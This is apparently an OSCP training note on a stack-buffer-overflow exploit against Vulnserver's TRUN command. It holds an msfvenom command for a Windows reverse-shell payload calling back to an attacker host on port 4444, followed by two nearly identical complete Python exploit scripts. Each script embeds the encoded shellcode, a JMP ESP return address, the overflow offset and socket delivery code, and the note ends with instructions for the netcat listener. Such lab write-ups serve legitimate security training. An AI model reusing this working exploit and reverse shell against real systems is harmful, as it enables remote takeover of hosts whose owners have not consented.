OSCP Security Technology - Modifying Shellcode
OSCP Security Technology - Modifying Shellcode
Generate the shellcode with msfvenom. The options matter: `-b "\x00"` excludes the null byte (the usual bad character for a string-handling target like TRUN), `EXITFUNC=thread` makes the payload terminate only its own thread instead of the whole vulnserver process when the shell exits, and `-f python -v buf` emits the `buf` variable that is pasted into the script below:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf
buffer.py
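#!/usr/bin/python
"""Vulnserver ``TRUN`` stack-overflow proof of concept.

Builds the ``TRUN /.:/`` request - junk up to the saved return address,
a JMP ESP address, a short NOP cushion, then the msfvenom reverse shell -
and sends it to ``host``:``port``.  The shellcode connects back to
LHOST=192.168.2.24 on port 4444, so a listener (``nc -nvlp 4444``) must
already be running on the attacker host.

Everything is assembled as ``bytes`` so the script behaves the same on
Python 2 and 3: the earlier version concatenated ``str`` with the bytes
``buf`` and sent a ``str``, which only works on Python 2 (on Python 3 it
raises TypeError, and a ``str`` "\\xcd" is not the single byte 0xcd).
"""
import socket
import os
import sys

host = "192.168.2.34"
port = 9999

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf
# 351 bytes
buf = b""
buf += b"\xbb\xb0\xb5\x1b\xfb\xdb\xda\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x83\xef\xfc\x31\x5f\x0e\x03\xef\xbb\xf9"
buf += b"\x0e\xf3\x2c\x7f\xf0\x0b\xad\xe0\x78\xee\x9c\x20\x1e"
buf += b"\x7b\x8e\x90\x54\x29\x23\x5a\x38\xd9\xb0\x2e\x95\xee"
buf += b"\x71\x84\xc3\xc1\x82\xb5\x30\x40\x01\xc4\x64\xa2\x38"
buf += b"\x07\x79\xa3\x7d\x7a\x70\xf1\xd6\xf0\x27\xe5\x53\x4c"
buf += b"\xf4\x8e\x28\x40\x7c\x73\xf8\x63\xad\x22\x72\x3a\x6d"
buf += b"\xc5\x57\x36\x24\xdd\xb4\x73\xfe\x56\x0e\x0f\x01\xbe"
buf += b"\x5e\xf0\xae\xff\x6e\x03\xae\x38\x48\xfc\xc5\x30\xaa"
buf += b"\x81\xdd\x87\xd0\x5d\x6b\x13\x72\x15\xcb\xff\x82\xfa"
buf += b"\x8a\x74\x88\xb7\xd9\xd2\x8d\x46\x0d\x69\xa9\xc3\xb0"
buf += b"\xbd\x3b\x97\x96\x19\x67\x43\xb6\x38\xcd\x22\xc7\x5a"
buf += b"\xae\x9b\x6d\x11\x43\xcf\x1f\x78\x0c\x3c\x12\x82\xcc"
buf += b"\x2a\x25\xf1\xfe\xf5\x9d\x9d\xb2\x7e\x38\x5a\xb4\x54"
buf += b"\xfc\xf4\x4b\x57\xfd\xdd\x8f\x03\xad\x75\x39\x2c\x26"
buf += b"\x85\xc6\xf9\xe9\xd5\x68\x52\x4a\x85\xc8\x02\x22\xcf"
buf += b"\xc6\x7d\x52\xf0\x0c\x16\xf9\x0b\xc7\xd9\x56\x11\x0f"
buf += b"\xb2\xa4\x15\x3e\x1e\x20\xf3\x2a\x8e\x64\xac\xc2\x37"
buf += b"\x2d\x26\x72\xb7\xfb\x43\xb4\x33\x08\xb4\x7b\xb4\x65"
buf += b"\xa6\xec\x34\x30\x94\xbb\x4b\xee\xb0\x20\xd9\x75\x40"
buf += b"\x2e\xc2\x21\x17\x67\x34\x38\xfd\x95\x6f\x92\xe3\x67"
buf += b"\xe9\xdd\xa7\xb3\xca\xe0\x26\x31\x76\xc7\x38\x8f\x77"
buf += b"\x43\x6c\x5f\x2e\x1d\xda\x19\x98\xef\xb4\xf3\x77\xa6"
buf += b"\x50\x85\xbb\x79\x26\x8a\x91\x0f\xc6\x3b\x4c\x56\xf9"
buf += b"\xf4\x18\x5e\x82\xe8\xb8\xa1\x59\xa9\xd9\x43\x4b\xc4"
buf += b"\x71\xda\x1e\x65\x1c\xdd\xf5\xaa\x19\x5e\xff\x52\xde"
buf += b"\x7e\x8a\x57\x9a\x38\x67\x2a\xb3\xac\x87\x99\xb4\xe4"

# 77A373CD FFE4 JMP ESP -- written little-endian, as it must land in EIP.
# Only valid while that module sits at the same base; re-check it if the
# target is rebooted or a different build/OS is used.
JMP_ESP = b"\xcd\x73\xa3\x77"
# Bytes of junk before the saved return address.  Target-specific
# (presumably found with pattern_create/pattern_offset); re-derive it for
# any other build of the target.
OFFSET = 2003
# Cushion between the return address and the shellcode.  The encoder stub
# begins with fnstenv (\xd9\x74\x24\xf4) and writes below ESP, so keeping a
# little distance is the usual precaution - confirm in a debugger that
# nothing lands on the decoded payload.
NOP_SLED = b"\x90" * 16
# Size of everything after the "TRUN /.:/" prefix; the request is padded
# with "C" up to this length so its total size never changes.
TOTAL_LEN = 5060


def build_payload(shellcode=buf):
    """Return the complete TRUN request as ``bytes``.

    Args:
        shellcode: bytes placed after the NOP cushion; defaults to the
            msfvenom ``buf`` above.  It must not contain the bad
            character ``\\x00`` (or any other byte the target mangles).

    Returns:
        ``b"TRUN /.:/"`` followed by exactly ``TOTAL_LEN`` bytes.

    Raises:
        ValueError: if ``shellcode`` does not fit inside ``TOTAL_LEN``
            (the old version silently produced negative padding instead).
    """
    padding = TOTAL_LEN - OFFSET - len(JMP_ESP) - len(NOP_SLED) - len(shellcode)
    if padding < 0:
        raise ValueError("shellcode too large by %d bytes" % -padding)
    return (
        b"TRUN /.:/"
        + b"A" * OFFSET
        + JMP_ESP
        + NOP_SLED
        + shellcode
        + b"C" * padding
    )


def main():
    """Connect to ``host``:``port`` and deliver the payload in one go."""
    expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        expl.connect((host, port))
        # sendall() keeps writing until everything is out; plain send() may
        # return after a partial write and silently truncate the request.
        expl.sendall(build_payload())
    finally:
        # close on every path, not only after a successful send
        expl.close()


if __name__ == "__main__":
    main()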
Start the handler on the attacker host first (`nc -nvlp 4444`, matching LHOST/LPORT in the msfvenom command), then run the script.
Modify the script to use a different JMP ESP address: replace the return-address bytes "\xcd\x73\xa3\x77" with "\xaf\x11\x50\x62" (little-endian 0x625011AF). Note that the `# 77A373CD FFE4 JMP ESP` comment in the listing below is left over from the first version and no longer describes these bytes.
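#!/usr/bin/python
"""Vulnserver ``TRUN`` stack-overflow proof of concept (second return address).

Same request layout as the first version - junk up to the saved return
address, a JMP ESP address, a short NOP cushion, then the msfvenom
reverse shell - but with the return address ``\\xaf\\x11\\x50\\x62``.
The shellcode connects back to LHOST=192.168.2.24 on port 4444, so a
listener (``nc -nvlp 4444``) must already be running on the attacker host.

Everything is assembled as ``bytes`` so the script behaves the same on
Python 2 and 3: the earlier version concatenated ``str`` with the bytes
``buf`` and sent a ``str``, which only works on Python 2 (on Python 3 it
raises TypeError, and a ``str`` "\\xaf" is not the single byte 0xaf).
"""
import socket
import os
import sys

host = "192.168.2.34"
port = 9999

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf
# 351 bytes
buf = b""
buf += b"\xbb\xb0\xb5\x1b\xfb\xdb\xda\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x83\xef\xfc\x31\x5f\x0e\x03\xef\xbb\xf9"
buf += b"\x0e\xf3\x2c\x7f\xf0\x0b\xad\xe0\x78\xee\x9c\x20\x1e"
buf += b"\x7b\x8e\x90\x54\x29\x23\x5a\x38\xd9\xb0\x2e\x95\xee"
buf += b"\x71\x84\xc3\xc1\x82\xb5\x30\x40\x01\xc4\x64\xa2\x38"
buf += b"\x07\x79\xa3\x7d\x7a\x70\xf1\xd6\xf0\x27\xe5\x53\x4c"
buf += b"\xf4\x8e\x28\x40\x7c\x73\xf8\x63\xad\x22\x72\x3a\x6d"
buf += b"\xc5\x57\x36\x24\xdd\xb4\x73\xfe\x56\x0e\x0f\x01\xbe"
buf += b"\x5e\xf0\xae\xff\x6e\x03\xae\x38\x48\xfc\xc5\x30\xaa"
buf += b"\x81\xdd\x87\xd0\x5d\x6b\x13\x72\x15\xcb\xff\x82\xfa"
buf += b"\x8a\x74\x88\xb7\xd9\xd2\x8d\x46\x0d\x69\xa9\xc3\xb0"
buf += b"\xbd\x3b\x97\x96\x19\x67\x43\xb6\x38\xcd\x22\xc7\x5a"
buf += b"\xae\x9b\x6d\x11\x43\xcf\x1f\x78\x0c\x3c\x12\x82\xcc"
buf += b"\x2a\x25\xf1\xfe\xf5\x9d\x9d\xb2\x7e\x38\x5a\xb4\x54"
buf += b"\xfc\xf4\x4b\x57\xfd\xdd\x8f\x03\xad\x75\x39\x2c\x26"
buf += b"\x85\xc6\xf9\xe9\xd5\x68\x52\x4a\x85\xc8\x02\x22\xcf"
buf += b"\xc6\x7d\x52\xf0\x0c\x16\xf9\x0b\xc7\xd9\x56\x11\x0f"
buf += b"\xb2\xa4\x15\x3e\x1e\x20\xf3\x2a\x8e\x64\xac\xc2\x37"
buf += b"\x2d\x26\x72\xb7\xfb\x43\xb4\x33\x08\xb4\x7b\xb4\x65"
buf += b"\xa6\xec\x34\x30\x94\xbb\x4b\xee\xb0\x20\xd9\x75\x40"
buf += b"\x2e\xc2\x21\x17\x67\x34\x38\xfd\x95\x6f\x92\xe3\x67"
buf += b"\xe9\xdd\xa7\xb3\xca\xe0\x26\x31\x76\xc7\x38\x8f\x77"
buf += b"\x43\x6c\x5f\x2e\x1d\xda\x19\x98\xef\xb4\xf3\x77\xa6"
buf += b"\x50\x85\xbb\x79\x26\x8a\x91\x0f\xc6\x3b\x4c\x56\xf9"
buf += b"\xf4\x18\x5e\x82\xe8\xb8\xa1\x59\xa9\xd9\x43\x4b\xc4"
buf += b"\x71\xda\x1e\x65\x1c\xdd\xf5\xaa\x19\x5e\xff\x52\xde"
buf += b"\x7e\x8a\x57\x9a\x38\x67\x2a\xb3\xac\x87\x99\xb4\xe4"

# Return address, little-endian bytes of 0x625011AF.  The "77A373CD FFE4
# JMP ESP" comment carried over from the first version of this script did
# not describe these bytes; presumably this is a JMP ESP (FF E4) in a
# module that is not rebased - verify it in the debugger before relying
# on it, and re-check if the target is rebooted or rebuilt.
JMP_ESP = b"\xaf\x11\x50\x62"
# Bytes of junk before the saved return address.  Target-specific
# (presumably found with pattern_create/pattern_offset); re-derive it for
# any other build of the target.
OFFSET = 2003
# Cushion between the return address and the shellcode.  The encoder stub
# begins with fnstenv (\xd9\x74\x24\xf4) and writes below ESP, so keeping a
# little distance is the usual precaution - confirm in a debugger that
# nothing lands on the decoded payload.
NOP_SLED = b"\x90" * 16
# Size of everything after the "TRUN /.:/" prefix; the request is padded
# with "C" up to this length so its total size never changes.
TOTAL_LEN = 5060


def build_payload(shellcode=buf):
    """Return the complete TRUN request as ``bytes``.

    Args:
        shellcode: bytes placed after the NOP cushion; defaults to the
            msfvenom ``buf`` above.  It must not contain the bad
            character ``\\x00`` (or any other byte the target mangles).

    Returns:
        ``b"TRUN /.:/"`` followed by exactly ``TOTAL_LEN`` bytes.

    Raises:
        ValueError: if ``shellcode`` does not fit inside ``TOTAL_LEN``
            (the old version silently produced negative padding instead).
    """
    padding = TOTAL_LEN - OFFSET - len(JMP_ESP) - len(NOP_SLED) - len(shellcode)
    if padding < 0:
        raise ValueError("shellcode too large by %d bytes" % -padding)
    return (
        b"TRUN /.:/"
        + b"A" * OFFSET
        + JMP_ESP
        + NOP_SLED
        + shellcode
        + b"C" * padding
    )


def main():
    """Connect to ``host``:``port`` and deliver the payload in one go."""
    expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        expl.connect((host, port))
        # sendall() keeps writing until everything is out; plain send() may
        # return after a partial write and silently truncate the request.
        expl.sendall(build_payload())
    finally:
        # close on every path, not only after a successful send
        expl.close()


if __name__ == "__main__":
    main()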
Catch the reverse shell on the attacker host (192.168.2.24, the LHOST/LPORT given to msfvenom): nc -nvlp 4444
Refer to:
http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/